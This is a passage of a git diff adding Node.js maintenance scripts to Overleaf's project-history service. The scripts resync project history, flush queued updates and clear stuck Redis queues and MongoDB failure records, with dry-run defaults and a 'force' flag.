(gracefulShutdownInitiated) throw err + } + } + + try { + await UpdatesProcessor.promises.processUpdatesForProject(projectId) + } catch (err) { + // @ts-ignore err is Error + throw new OError('failed to flush updates', {}, err) + } +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<void>} + */ +async function tryProcessProject(projectId, historyId) { + await flushWithRetries(projectId) + const start = new Date() + let needsFullSync = false + try { + await UpdatesProcessor.promises.startResyncAndProcessUpdatesUnderLock( + projectId, + { resyncProjectStructureOnly: true } + ) + } catch (err) { + if (err instanceof NeedFullProjectStructureResyncError) { + needsFullSync = true + } else { + throw err + } + } + if (needsFullSync) { + logger.warn( + { projectId, historyId }, + 'structure only resync not sufficient, doing full soft resync' + ) + await SyncManager.promises.startResync(projectId, {}) + await UpdatesProcessor.promises.processUpdatesForProject(projectId) + STATS.changed++ + } else { + const after = await getLastEndTimestamp(projectId, historyId) + if (after > start) { + STATS.changed++ + } + } + // Avoid db.projectHistorySyncState from growing for each project we resynced. + // MongoDB collections cannot shrink on their own. In case of success, purge + // the db entry created by this script right away. 
+  await SyncManager.promises.clearResyncStateIfAllAfter(projectId, start)
+}
+
+async function processBatch(projects) {
+  const projectIds = (
+    await promiseMapWithLimit(READ_CONCURRENCY, projects, checkProject)
+  ).filter(id => !!id)
+  await promiseMapWithLimit(WRITE_CONCURRENCY, projectIds, ids =>
+    processProject(ids.projectId, ids.historyId)
+  )
+
+  if (gracefulShutdownInitiated) throw new Error('graceful shutdown triggered')
+}
+
+async function processProjectsFromLog() {
+  const rl = readline.createInterface({
+    input: fs.createReadStream(argv.logs),
+  })
+  for await (const line of rl) {
+    if (gracefulShutdownInitiated) break
+    STATS.processedLines++
+    if (!line.startsWith('{')) continue
+    const { projectId, historyId, msg } = JSON.parse(line)
+    if (msg !== 'failed to process project') continue
+    await processProject(projectId, historyId) // does try/catch with logging
+  }
+}
+
+async function main() {
+  if (argv.logs) {
+    await processProjectsFromLog()
+    return
+  }
+  await batchedUpdate(db.projects, {}, processBatch, {
+    _id: 1,
+    lastUpdated: 1,
+    'overleaf.history': 1,
+    rootFolder: 1,
+  })
+}
+
+try {
+  try {
+    await main()
+  } finally {
+    clearInterval(logInterval)
+    logStats()
+    Metrics.close()
+    await mongoClient.close()
+    // TODO(das7pad): graceful shutdown for redis. Refactor process.exit when done.
+  }
+  console.log('Done.')
+  await setTimeout(1_000)
+  if (STATS.failure) {
+    process.exit(Math.min(STATS.failure, 99))
+  } else {
+    process.exit(0)
+  }
+} catch (err) {
+  logger.err({ err }, 'fatal error')
+  await setTimeout(1_000)
+  process.exit(100)
+}
diff --git a/services/project-history/scripts/clear_dangling_timestamps.js b/services/project-history/scripts/clear_dangling_timestamps.js
new file mode 100644
index 0000000..e83eb1d
--- /dev/null
+++ b/services/project-history/scripts/clear_dangling_timestamps.js
@@ -0,0 +1,43 @@
+#!/usr/bin/env node
+
+// Clear timestamps which don't have any corresponding history ops
+// usage: scripts/clear_dangling_timestamps.js <limit>
+
+import logger from '@overleaf/logger'
+import * as RedisManager from '../app/js/RedisManager.js'
+
+const argv = process.argv.slice(2)
+const limit = parseInt(argv[0], 10) || null
+
+// find all dangling timestamps and clear them
+async function main() {
+  logger.info(
+    { limit },
+    'running redis scan for project timestamps, this may take a while'
+  )
+  const projectIdsWithFirstOpTimestamps =
+    await RedisManager.promises.getProjectIdsWithFirstOpTimestamps(limit)
+  const totalTimestamps = projectIdsWithFirstOpTimestamps.length
+  logger.info(
+    { totalTimestamps },
+    'scan completed, now clearing dangling timestamps'
+  )
+  let clearedTimestamps = 0
+  let processed = 0
+  for (const projectId of projectIdsWithFirstOpTimestamps) {
+    const result =
+      await RedisManager.promises.clearDanglingFirstOpTimestamp(projectId)
+    processed++
+    clearedTimestamps += result
+    if (processed % 1000 === 0) {
+      logger.info(
+        { processed, totalTimestamps, clearedTimestamps },
+        'clearing timestamps'
+      )
+    }
+  }
+  logger.info({ processed, totalTimestamps, clearedTimestamps }, 'completed')
+  process.exit(0)
+}
+
+main()
diff --git a/services/project-history/scripts/clear_deleted.js b/services/project-history/scripts/clear_deleted.js
new file mode 100755
index 0000000..a4a6919
--- /dev/null
+++ b/services/project-history/scripts/clear_deleted.js
@@ -0,0 +1,136 @@
+#!/usr/bin/env node
+
+import async from 'async'
+import logger from '@overleaf/logger'
+import Settings from '@overleaf/settings'
+import redis from '@overleaf/redis-wrapper'
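+// Flow of this script: a stuck queue is only cleared once its project is gone
+// from both the projects collection (checkDeleted) and the recoverable
+// deletedProjects collection (checkRecoverable); the Redis queue key is then
+// expired and the projectHistoryFailures record removed. Pass "force" as the
+// second argument to apply the changes; otherwise this is a dry run.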
+import { db, ObjectId } from '../app/js/mongodb.js' + +logger.logger.level('fatal') + +const rclient = redis.createClient(Settings.redis.project_history) +const Keys = Settings.redis.project_history.key_schema + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const force = argv[1] === 'force' || false +let delay = 0 + +function checkAndClear(project, callback) { + const projectId = project.project_id + function checkDeleted(cb) { + db.projects.findOne( + { _id: new ObjectId(projectId) }, + { projection: { _id: 1 } }, + (err, result) => { + if (err) { + cb(err) + } else if (!result) { + // project not found, but we still need to look at deletedProjects + cb() + } else { + console.log(`Project ${projectId} found in projects`) + cb(new Error('error: project still exists')) + } + } + ) + } + + function checkRecoverable(cb) { + db.deletedProjects.findOne( + { + // this condition makes use of the index + 'deleterData.deletedProjectId': new ObjectId(projectId), + // this condition checks if the deleted project has expired + 'project._id': new ObjectId(projectId), + }, + { projection: { _id: 1 } }, + (err, result) => { + if (err) { + cb(err) + } else if (!result) { + console.log( + `project ${projectId} has been deleted - safe to clear queue` + ) + cb() + } else { + console.log(`Project ${projectId} found in deletedProjects`) + cb(new Error('error: project still exists')) + } + } + ) + } + + function clearRedisQueue(cb) { + const key = Keys.projectHistoryOps({ project_id: projectId }) + delay++ + if (force) { + console.log('setting redis key', key, 'to expire in', delay, 'seconds') + // use expire to allow redis to delete the key in the background + rclient.expire(key, delay, err => { + cb(err) + }) + } else { + console.log( + 'dry run, would set key', + key, + 'to expire in', + delay, + 'seconds' + ) + cb() + } + } + + function clearMongoEntry(cb) { + if (force) { + console.log('deleting key in mongo projectHistoryFailures', projectId) + db.projectHistoryFailures.deleteOne({ project_id: projectId }, cb) + } else { + console.log('would delete failure record for', projectId, 'from mongo') + cb() + } + } + + // do the checks and deletions + async.waterfall( + [checkDeleted, checkRecoverable, clearRedisQueue, clearMongoEntry], + err => { + if (!err || err.message === 'error: project still exists') { + callback() + } else { + console.log('error:', err) + callback(err) + } + } + ) +} + +// find all the broken projects from the failure records +async function main() { + const results = await db.projectHistoryFailures.find({}).toArray() + processFailures(results) +} + +main().catch(error => { + console.error(error) + process.exit(1) +}) + +function processFailures(results) { + if (argv.length === 0) { + console.log(` +Usage: node clear_deleted.js [QUEUES] [FORCE] + +where + QUEUES is the number of queues to process + FORCE is the string "force" when we're ready to delete the queues. 
Without it, this script does a dry-run
+`)
+  }
+  console.log('number of stuck projects', results.length)
+  // now check if the project is truly deleted in mongo
+  async.eachSeries(results.slice(0, limit), checkAndClear, err => {
+    console.log('DONE', err)
+    process.exit()
+  })
+}
diff --git a/services/project-history/scripts/clear_deleted_history.js b/services/project-history/scripts/clear_deleted_history.js
new file mode 100755
index 0000000..899146a
--- /dev/null
+++ b/services/project-history/scripts/clear_deleted_history.js
@@ -0,0 +1,175 @@
+#!/usr/bin/env node
+
+// To run in dev:
+//
+// docker compose run --rm project-history scripts/clear_deleted_history.js
+//
+// In production:
+//
+// docker run --rm $(docker ps -lq) scripts/clear_deleted_history.js
+
+import async from 'async'
+import logger from '@overleaf/logger'
+import Settings from '@overleaf/settings'
+import redis from '@overleaf/redis-wrapper'
+import { db, ObjectId } from '../app/js/mongodb.js'
+
+logger.logger.level('fatal')
+
+const rclient = redis.createClient(Settings.redis.project_history)
+const Keys = Settings.redis.project_history.key_schema
+
+const argv = process.argv.slice(2)
+const limit = parseInt(argv[0], 10) || null
+const force = argv[1] === 'force' || false
+let projectNotFoundErrors = 0
+let projectImportedFromV1Errors = 0
+const projectsNotFound = []
+const projectsImportedFromV1 = []
+let projectWithHistoryIdErrors = 0
+const projectsWithHistoryId = []
+
+function checkAndClear(project, callback) {
+  const projectId = project.project_id
+  console.log('checking project', projectId)
+
+  function checkDeleted(cb) {
+    db.projects.findOne(
+      { _id: new ObjectId(projectId) },
+      { projection: { overleaf: true } },
+      (err, result) => {
+        console.log(
+          '1. looking in mongo projects collection: err',
+          err,
+          'result',
+          JSON.stringify(result)
+        )
+        if (err) {
+          return cb(err)
+        }
+        if (!result) {
+          return cb(new Error('project not found in mongo'))
+        }
+        if (
+          result &&
+          result.overleaf &&
+          !result.overleaf.id &&
+          result.overleaf.history &&
+          !result.overleaf.history.id &&
+          result.overleaf.history.deleted_id
+        ) {
+          console.log(
+            ' - project is not imported from v1 and has a deleted_id - ok to clear'
+          )
+          return cb()
+        } else if (result && result.overleaf && result.overleaf.id) {
+          console.log(' - project is imported from v1')
+          return cb(
+            new Error('project is imported from v1 - will not clear it')
+          )
+        } else if (
+          result &&
+          result.overleaf &&
+          result.overleaf.history &&
+          result.overleaf.history.id
+        ) {
+          console.log(' - project has a history id')
+          return cb(new Error('project has a history id - will not clear it'))
+        } else {
+          console.log(' - project state not recognised')
+          return cb(new Error('project state not recognised'))
+        }
+      }
+    )
+  }
+
+  function clearRedisQueue(cb) {
+    const key = Keys.projectHistoryOps({ project_id: projectId })
+    if (force) {
+      console.log('deleting redis key', key)
+      rclient.del(key, err => {
+        cb(err)
+      })
+    } else {
+      console.log('dry run, would delete key', key)
+      cb()
+    }
+  }
+
+  function clearMongoEntry(cb) {
+    if (force) {
+      console.log('deleting key in mongo projectHistoryFailures', projectId)
+      db.projectHistoryFailures.deleteOne(
+        { project_id: projectId },
+        (err, result) => {
+          console.log('got result from remove', err, result)
+          cb(err)
+        }
+      )
+    } else {
+      console.log('would delete failure record for', projectId, 'from mongo')
+      cb()
+    }
+  }
+
+  // do the checks and deletions
+  async.waterfall([checkDeleted, clearRedisQueue, clearMongoEntry], err => {
+    if (!err) {
+      if (force) {
+        return setTimeout(callback, 100)
+      } // include a 100ms delay between projects
+      return callback()
+    } else if (err.message === 'project not found in mongo') {
+      projectNotFoundErrors++
+      projectsNotFound.push(projectId)
+      return callback()
+    } else if (
+      err.message === 'project has a history id - will not clear it'
+    ) {
+      projectWithHistoryIdErrors++
+      projectsWithHistoryId.push(projectId)
+      return callback()
+    } else if (
+      err.message === 'project is imported from v1 - will not clear it'
+    ) {
+      projectImportedFromV1Errors++
+      projectsImportedFromV1.push(projectId)
+      return callback()
+    } else {
+      console.log('error:', err)
+      return callback(err)
+    }
+  })
+}
+
+// find all the broken projects from the failure records
+async function main() {
+  const results = await db.projectHistoryFailures
+    .find({ error: /history store a non-success status code: 422/ })
+    .toArray()
+
+  console.log('number of queues with history store 422 =', results.length)
+  // now check if the project is truly deleted in mongo
+  async.eachSeries(results.slice(0, limit), checkAndClear, err => {
+    console.log('Final error status', err)
+    console.log(
+      'Project not found errors',
+      projectNotFoundErrors,
+      projectsNotFound
+    )
+    console.log(
+      'Project with history id errors',
+      projectWithHistoryIdErrors,
+      projectsWithHistoryId
+    )
+    console.log(
+      'Project imported from V1 errors',
+      projectImportedFromV1Errors,
+      projectsImportedFromV1
+    )
+    process.exit()
+  })
+}
+
+main().catch(error => {
+  console.error(error)
+  process.exit(1)
+})
diff --git a/services/project-history/scripts/clear_filestore_404.js b/services/project-history/scripts/clear_filestore_404.js
new file mode 100755
index 0000000..3c9ca98
--- /dev/null
+++ b/services/project-history/scripts/clear_filestore_404.js
@@ -0,0 +1,204 @@
+#!/usr/bin/env node
+
+// To run in dev:
+//
+// docker compose run --rm project-history scripts/clear_filestore_404.js
+//
+// In production:
+//
+// docker run --rm $(docker ps -lq) scripts/clear_filestore_404.js
+
+import async from 'async'
+import logger from '@overleaf/logger'
+import request from 'request'
+import Settings from '@overleaf/settings'
+import redis from '@overleaf/redis-wrapper'
+import { db, ObjectId } from '../app/js/mongodb.js'
+
+logger.logger.level('fatal')
+
+const rclient = redis.createClient(Settings.redis.project_history)
+const Keys = Settings.redis.project_history.key_schema
+
+const argv = process.argv.slice(2)
+const limit = parseInt(argv[0], 10) || null
+const force = argv[1] === 'force' || false
+let projectNotFoundErrors = 0
+let projectImportedFromV1Errors = 0
+const projectsNotFound = []
+const projectsImportedFromV1 = []
+
+function checkAndClear(project, callback) {
+  const projectId = project.project_id
+  console.log('checking project', projectId)
+
+  // These can probably also be reset and their overleaf.history.id unset
+  // (unless they are v1 projects).
+
+  function checkNotV1Project(cb) {
+    db.projects.findOne(
+      { _id: new ObjectId(projectId) },
+      { projection: { overleaf: true } },
+      (err, result) => {
+        console.log(
+          '1. looking in mongo projects collection: err',
+          err,
+          'result',
+          JSON.stringify(result)
+        )
+        if (err) {
+          return cb(err)
+        }
+        if (!result) {
+          return cb(new Error('project not found in mongo'))
+        }
+        if (result && result.overleaf && !result.overleaf.id) {
+          console.log(' - project is not imported from v1 - ok to clear')
+          cb()
+        } else {
+          cb(new Error('project is imported from v1 - will not clear it'))
+        }
+      }
+    )
+  }
+
+  function clearProjectHistoryInMongo(cb) {
+    if (force) {
+      console.log('2. deleting overleaf.history.id in mongo project', projectId)
+      // Accessing mongo projects collection directly - BE CAREFUL!
+      db.projects.updateOne(
+        { _id: new ObjectId(projectId) },
+        { $unset: { 'overleaf.history.id': '' } },
+        (err, result) => {
+          console.log(' - got result from remove', err, result)
+          if (err) {
+            return cb(err)
+          }
+          if (
+            result &&
+            (result.modifiedCount === 1 || result.modifiedCount === 0)
+          ) {
+            return cb()
+          } else {
+            return cb(
+              new Error('error: problem trying to unset overleaf.history.id')
+            )
+          }
+        }
+      )
+    } else {
+      console.log(
+        '2. would delete overleaf.history.id for',
+        projectId,
+        'from mongo'
+      )
+      cb()
+    }
+  }
+
+  function clearDocUpdaterCache(cb) {
+    const url = Settings.apis.documentupdater.url + '/project/' + projectId
+    if (force) {
+      console.log('3. making request to clear docupdater', url)
+      request.delete(url, (err, response, body) => {
+        console.log(
+          ' - result of request',
+          err,
+          response && response.statusCode,
+          body
+        )
+        cb(err)
+      })
+    } else {
+      console.log('3. dry run, would request DELETE on url', url)
+      cb()
+    }
+  }
+
+  function clearRedisQueue(cb) {
+    const key = Keys.projectHistoryOps({ project_id: projectId })
+    if (force) {
+      console.log('4. deleting redis queue key', key)
+      rclient.del(key, err => {
+        cb(err)
+      })
+    } else {
+      console.log('4. dry run, would delete redis key', key)
+      cb()
+    }
+  }
+
+  function clearMongoEntry(cb) {
+    if (force) {
+      console.log('5. deleting key in mongo projectHistoryFailures', projectId)
+      db.projectHistoryFailures.deleteOne(
+        { project_id: projectId },
+        (err, result) => {
+          console.log(' - got result from remove', err, result)
+          cb(err)
+        }
+      )
+    } else {
+      console.log('5. would delete failure record for', projectId, 'from mongo')
+      cb()
+    }
+  }
+
+  // do the checks and deletions
+  async.waterfall(
+    [
+      checkNotV1Project,
+      clearProjectHistoryInMongo,
+      clearDocUpdaterCache,
+      clearRedisQueue,
+      clearMongoEntry,
+    ],
+    err => {
+      if (!err) {
+        return setTimeout(callback, 1000) // include a 1 second delay
+      } else if (err.message === 'project not found in mongo') {
+        projectNotFoundErrors++
+        projectsNotFound.push(projectId)
+        return callback()
+      } else if (
+        err.message === 'project is imported from v1 - will not clear it'
+      ) {
+        projectImportedFromV1Errors++
+        projectsImportedFromV1.push(projectId)
+        return callback()
+      } else {
+        console.log('error:', err)
+        return callback(err)
+      }
+    }
+  )
+}
+
+// find all the broken projects from the failure records
+async function main() {
+  const results = await db.projectHistoryFailures
+    .find({ error: 'Error: bad response from filestore: 404' })
+    .toArray()
+
+  console.log('number of queues with filestore 404 =', results.length)
+  // now check if the project is truly deleted in mongo
+  async.eachSeries(results.slice(0, limit), checkAndClear, err => {
+    console.log('Final error status', err)
+    console.log(
+      'Project not found errors',
+      projectNotFoundErrors,
+      projectsNotFound
+    )
+    console.log(
+      'Project imported from V1 errors',
+      projectImportedFromV1Errors,
+      projectsImportedFromV1
+    )
+    process.exit()
+  })
+}
+
+main().catch(error => {
+  console.error(error)
+  process.exit(1)
+})
diff --git a/services/project-history/scripts/clear_project_version_out_of_order.js b/services/project-history/scripts/clear_project_version_out_of_order.js
new file mode 100755
index 0000000..54883a8
--- /dev/null
+++ b/services/project-history/scripts/clear_project_version_out_of_order.js
@@ -0,0 +1,260 @@
+#!/usr/bin/env node
+
+// To run in dev:
+//
+// docker compose run --rm project-history scripts/clear_project_version_out_of_order.js
+//
+// In production:
+//
+// docker run --rm $(docker ps -lq) scripts/clear_project_version_out_of_order.js
+
+import async from 'async'
+import logger from '@overleaf/logger'
+import request from 'request'
+import Settings from '@overleaf/settings'
+import redis from '@overleaf/redis-wrapper'
+import { db, ObjectId } from '../app/js/mongodb.js'
+
+logger.logger.level('fatal')
+
+const rclient = redis.createClient(Settings.redis.project_history)
+const Keys = Settings.redis.project_history.key_schema
+
+const argv = process.argv.slice(2)
+const limit = parseInt(argv[0], 10) || null
+const force = argv[1] === 'force' || false
+let projectNotFoundErrors = 0
+let projectImportedFromV1Errors = 0
+const projectsNotFound = []
+const projectsImportedFromV1 = []
+let projectHasV2HistoryErrors = 0
+const projectsV2HistoryInUse = []
+
+function checkAndClear(project, callback) {
+  const projectId = project.project_id
+  console.log('checking project', projectId)
+
+  // These can probably also be reset and their overleaf.history.id unset
+  // (unless they are v1 projects).
+
+  function checkNotV1Project(cb) {
+    db.projects.findOne(
+      { _id: new ObjectId(projectId) },
+      { projection: { overleaf: true } },
+      (err, result) => {
+        console.log(
+          '1. looking in mongo projects collection: err',
+          err,
+          'result',
+          JSON.stringify(result)
+        )
+        if (err) {
+          return cb(err)
+        }
+        if (!result) {
+          return cb(new Error('project not found in mongo'))
+        }
+
+        const isV1Project = result && result.overleaf && result.overleaf.id
+        const hasHistoryId =
+          result &&
+          result.overleaf &&
+          result.overleaf.history &&
+          result.overleaf.history.id
+        const hasV2HistoryInUse =
+          result &&
+          result.overleaf &&
+          result.overleaf.history &&
+          result.overleaf.history.display
+        const hasExistingDeletedHistory =
+          result &&
+          result.overleaf.history &&
+          result.overleaf.history.deleted_id
+        if (
+          hasHistoryId &&
+          !(isV1Project || hasV2HistoryInUse || hasExistingDeletedHistory)
+        ) {
+          console.log(
+            ' - project is not imported from v1 and v2 history is not in use - ok to clear'
+          )
+          return cb()
+        } else if (hasHistoryId && hasExistingDeletedHistory) {
+          console.log(' - project already has deleted_id')
+          return cb(
+            new Error('project already has deleted_id - will not clear it')
+          )
+        } else if (hasHistoryId && isV1Project) {
+          console.log(' - project is imported from v1')
+          return cb(
+            new Error('project is imported from v1 - will not clear it')
+          )
+        } else if (hasHistoryId && hasV2HistoryInUse) {
+          console.log(' - project is displaying v2 history')
+          return cb(
+            new Error('project is displaying v2 history - will not clear it')
+          )
+        } else {
+          console.log(' - project state not recognised')
+          return cb(new Error('project state not recognised'))
+        }
+      }
+    )
+  }
+
+  function clearProjectHistoryInMongo(cb) {
+    if (force) {
+      console.log('2. renaming overleaf.history.id in mongo project', projectId)
+      // Accessing mongo projects collection directly - BE CAREFUL!
+      db.projects.updateOne(
+        { _id: new ObjectId(projectId) },
+        { $rename: { 'overleaf.history.id': 'overleaf.history.deleted_id' } },
+        (err, result) => {
+          console.log(' - got result from rename', err, result)
+          if (err) {
+            return cb(err)
+          }
+          if (
+            result &&
+            (result.modifiedCount === 1 || result.modifiedCount === 0)
+          ) {
+            return cb()
+          } else {
+            return cb(
+              new Error('error: problem trying to rename overleaf.history.id')
+            )
+          }
+        }
+      )
+    } else {
+      console.log(
+        '2. would rename overleaf.history.id for',
+        projectId,
+        'in mongo'
+      )
+      cb()
+    }
+  }
+
+  function clearDocUpdaterCache(cb) {
+    const url = Settings.apis.documentupdater.url + '/project/' + projectId
+    if (force) {
+      console.log('3. making request to clear docupdater', url)
+      request.delete(url, (err, response, body) => {
+        console.log(
+          ' - result of request',
+          err,
+          response && response.statusCode,
+          body
+        )
+        cb(err)
+      })
+    } else {
+      console.log('3. dry run, would request DELETE on url', url)
+      cb()
+    }
+  }
+
+  function clearRedisQueue(cb) {
+    const key = Keys.projectHistoryOps({ project_id: projectId })
+    if (force) {
+      console.log('4. deleting redis queue key', key)
+      rclient.del(key, err => {
+        cb(err)
+      })
+    } else {
+      console.log('4. dry run, would delete redis key', key)
+      cb()
+    }
+  }
+
+  function clearMongoEntry(cb) {
+    if (force) {
+      console.log('5. deleting key in mongo projectHistoryFailures', projectId)
+      db.projectHistoryFailures.deleteOne(
+        { project_id: projectId },
+        (err, result) => {
+          console.log(' - got result from remove', err, result)
+          cb(err)
+        }
+      )
+    } else {
+      console.log('5. would delete failure record for', projectId, 'from mongo')
+      cb()
+    }
+  }
+
+  // do the checks and deletions
+  async.waterfall(
+    [
+      checkNotV1Project,
+      clearProjectHistoryInMongo,
+      clearDocUpdaterCache,
+      clearRedisQueue,
+      clearMongoEntry,
+    ],
+    err => {
+      if (!err) {
+        return setTimeout(callback, 100) // include a delay
+      } else if (err.message === 'project not found in mongo') {
+        projectNotFoundErrors++
+        projectsNotFound.push(projectId)
+        return callback()
+      } else if (
+        err.message === 'project is imported from v1 - will not clear it'
+      ) {
+        projectImportedFromV1Errors++
+        projectsImportedFromV1.push(projectId)
+        return callback()
+      } else if (
+        err.message === 'project is displaying v2 history - will not clear it'
+      ) {
+        projectHasV2HistoryErrors++
+        projectsV2HistoryInUse.push(projectId)
+        return callback()
+      } else {
+        console.log('error:', err)
+        return callback(err)
+      }
+    }
+  )
+}
+
+// find all the broken projects from the failure records
+async function main() {
+  const results = await db.projectHistoryFailures
+    .find({
+      error:
+        'OpsOutOfOrderError: project structure version out of order on incoming updates',
+    })
+    .toArray()
+
+  console.log(
+    'number of queues with project structure version out of order on incoming updates =',
+    results.length
+  )
+  // now clear the projects
+  async.eachSeries(results.slice(0, limit), checkAndClear, err => {
+    console.log('Final error status', err)
+    console.log(
+      'Project not found errors',
+      projectNotFoundErrors,
+      projectsNotFound
+    )
+    console.log(
+      'Project imported from V1 errors',
+      projectImportedFromV1Errors,
+      projectsImportedFromV1
+    )
+    console.log(
+      'Project has V2 history in use',
+      projectHasV2HistoryErrors,
+      projectsV2HistoryInUse
+    )
+    process.exit()
+  })
+}
+
+main().catch(error => {
+  console.error(error)
+  process.exit(1)
+})
diff --git a/services/project-history/scripts/debug_translate_updates.js b/services/project-history/scripts/debug_translate_updates.js
new file mode 100755
index 0000000..bb89637
--- /dev/null
+++ b/services/project-history/scripts/debug_translate_updates.js
@@ -0,0 +1,74 @@
+#!/usr/bin/env node
+
+/**
+ * This script takes a dump file, obtained via the /project/:project_id/dump
+ * endpoint, and feeds it to the update translator to see how updates are
+ * transformed into changes sent to v1 history.
+ */ +import fs from 'node:fs' +import * as UpdateTranslator from '../app/js/UpdateTranslator.js' +import * as SyncManager from '../app/js/SyncManager.js' +import * as HistoryStoreManager from '../app/js/HistoryStoreManager.js' + +const { filename } = parseArgs() +const { projectId, updates, chunk } = parseDumpFile(filename) + +function expandResyncProjectStructure(chunk, update) { + HistoryStoreManager._mocks.getMostRecentChunk = function ( + projectId, + projectHistoryId, + callback + ) { + callback(null, chunk) + } + + SyncManager.expandSyncUpdates( + projectId, + 99999, // dummy history id + chunk, + [update], + cb => cb(), // extend lock + (err, result) => { + console.log('err', err, 'result', JSON.stringify(result, null, 2)) + process.exit() + } + ) +} + +function expandUpdates(updates) { + const wrappedUpdates = updates.map(update => ({ update })) + let changes + try { + changes = UpdateTranslator.convertToChanges(projectId, wrappedUpdates) + } catch (err) { + error(err) + } + console.log(JSON.stringify(changes, null, 2)) +} + +if (updates[0].resyncProjectStructure) { + expandResyncProjectStructure(chunk, updates[0]) +} else { + expandUpdates(updates) +} + +function parseArgs() { + const args = process.argv.slice(2) + if (args.length !== 1) { + console.log('Usage: debug_translate_updates.js DUMP_FILE') + process.exit(1) + } + const filename = args[0] + return { filename } +} + +function parseDumpFile(filename) { + const json = fs.readFileSync(filename) + const { project_id: projectId, updates, chunk } = JSON.parse(json) + return { projectId, updates, chunk } +} + +function error(err) { + console.error(err) + process.exit(1) +} diff --git a/services/project-history/scripts/flush_all.js b/services/project-history/scripts/flush_all.js new file mode 100755 index 0000000..83f8fbd --- /dev/null +++ b/services/project-history/scripts/flush_all.js @@ -0,0 +1,93 @@ +#!/usr/bin/env node + +// To run in dev: +// +// docker compose run --rm project-history scripts/flush_all.js <limit> +// +// In production: +// +// docker run --rm $(docker ps -lq) scripts/flush_all.js <limit> + +import _ from 'lodash' +import async from 'async' +import logger from '@overleaf/logger' +import * as RedisManager from '../app/js/RedisManager.js' +import * as UpdatesProcessor from '../app/js/UpdatesProcessor.js' + +logger.logger.level('fatal') + +const argv = process.argv.slice(2) +const limit = parseInt(argv[0], 10) || null +const parallelism = Math.min(parseInt(argv[1], 10) || 1, 10) + +// flush all outstanding changes +RedisManager.getProjectIdsWithHistoryOps(limit, flushProjects) + +function flushProjects(error, projectIds) { + if (error) { + throw error + } + let ts = new Date() + console.log( + 'found projects', + JSON.stringify({ project_ids: projectIds.length, limit, ts }) + ) + projectIds = _.shuffle(projectIds) // randomise to avoid hitting same projects each time + if (limit > 0) { + projectIds = projectIds.slice(0, limit) + } + + let succeededProjects = 0 + let failedProjects = 0 + let attempts = 0 + + async.eachLimit( + projectIds, + parallelism, + function (projectId, cb) { + attempts++ + UpdatesProcessor.processUpdatesForProject( + projectId, + function (err, queueSize) { + const progress = attempts + '/' + projectIds.length + ts = new Date() + if (err) { + failedProjects++ + console.log( + 'failed', + progress, + JSON.stringify({ + projectId, + queueSize, + ts, + err: err.toString(), + }) + ) + } else { + succeededProjects++ + console.log( + 'succeeded', + progress, + JSON.stringify({ + projectId, + 
queueSize, + ts, + }) + ) + } + return cb() + } + ) + }, + function () { + console.log( + 'total', + JSON.stringify({ + succeededProjects, + failedProjects, + }) + ) + process.exit(0) + } + ) +} diff --git a/services/project-history/scripts/flush_old.js b/services/project-history/scripts/flush_old.js new file mode 100644 index 0000000..6dc1401 --- /dev/null +++ b/services/project-history/scripts/flush_old.js @@ -0,0 +1,191 @@ +#!/usr/bin/env node + +import Settings from '@overleaf/settings' +import minimist from 'minimist' +import logger from '@overleaf/logger' +import PQueue from 'p-queue' +import * as RedisManager from '../app/js/RedisManager.js' +import * as ErrorRecorder from '../app/js/ErrorRecorder.js' + +logger.logger.level('fatal') + +function usage() { + console.log(` +Usage: flush_old.js [options] + +Options: + -b, --batch-size <size> Number of projects to process in each batch (default: 100) + -a, --max-age <seconds> Maximum age of projects to keep (default: 3600) + -i, --interval <seconds> Interval to spread the processing over (default: 300) + -c, --concurrency <number> Number of concurrent jobs (default: 10) + -u, --buffer <seconds> Buffer time in seconds to reserve at end (default: 15) + -n, --dry-run Show what would be done without making changes + -h, --help Show this help message + +Examples: + # Flush projects older than 24 hours with 5 concurrent jobs + flush_old.js --batch-size 100 --max-age 86400 -c 5 + + # Dry run to see what would be flushed + flush_old.js --max-age 3600 --dry-run +`) + process.exit(0) +} + +const argv = minimist(process.argv.slice(2), { + boolean: ['dry-run', 'help'], + alias: { + b: 'batch-size', + a: 'max-age', + i: 'interval', + c: 'concurrency', + n: 'dry-run', + u: 'buffer', + h: 'help', + }, + default: { + 'batch-size': 100, + 'max-age': 3600, + interval: 300, + concurrency: 10, + 'dry-run': false, + buffer: 15, + help: false, + }, +}) + +if (argv.help || process.argv.length === 2) { + usage() +} + +const batchSize = parseInt(argv['batch-size'], 10) +const maxAge = argv['max-age'] ? 
parseInt(argv['max-age'], 10) : null
+const interval = parseInt(argv.interval, 10) || 300
+const concurrency = parseInt(argv.concurrency, 10) || 10
+const bufferTime = parseInt(argv.buffer, 10) || 15
+const dryRun = argv['dry-run']
+
+/**
+ * Generator function that yields batches of items from an array
+ * @param {Array} array - The array to batch
+ * @param {number} size - The size of each batch
+ * @yields {Array} A batch of items
+ */
+function* getBatches(array, size) {
+  for (let i = 0; i < array.length; i += size) {
+    yield array.slice(i, i + size)
+  }
+}
+
+let flushCount = 0
+
+async function flushProject({ projectId, timestamp }) {
+  const url = `${Settings.apis.project_history.url}/project/${projectId}/flush`
+  if (dryRun) {
+    console.log(`[DRY RUN] would flush project ${projectId}`)
+    return
+  }
+  const response = await fetch(url, {
+    method: 'POST',
+  })
+  flushCount++
+  if (flushCount % 100 === 0) {
+    console.log('flushed', flushCount, 'projects, up to', timestamp)
+  }
+  if (!response.ok) {
+    throw new Error(`failed to flush project ${projectId}`)
+  }
+}
+
+const SCRIPT_START_TIME = Date.now() // script start time in milliseconds since the epoch
+
+function olderThan(maxAge, timestamp) {
+  const age = (SCRIPT_START_TIME - timestamp) / 1000
+  return age > maxAge
+}
+
+async function main() {
+  const projectIds = await RedisManager.promises.getProjectIdsWithHistoryOps()
+  const failedProjects = await ErrorRecorder.promises.getFailedProjects()
+  const failedProjectIds = new Set(failedProjects.map(p => p.project_id))
+
+  const projectIdsToProcess = projectIds.filter(p => !failedProjectIds.has(p))
+  console.log('number of projects with history ops', projectIds.length)
+  console.log(
+    'number of failed projects to exclude',
+    projectIds.length - projectIdsToProcess.length
+  )
+  const collectedProjects = []
+  let nullCount = 0
+  // iterate over the project ids in batches, using a redis MGET to retrieve
+  // the first op timestamps
+  for (const batch of getBatches(projectIdsToProcess, batchSize)) {
+    const timestamps = await RedisManager.promises.getFirstOpTimestamps(batch)
+    const newProjects = batch
+      .map((projectId, idx) => {
+        return { projectId, timestamp: timestamps[idx] }
+      })
+      .filter(({ timestamp }) => {
+        if (!timestamp) {
+          nullCount++
+        }
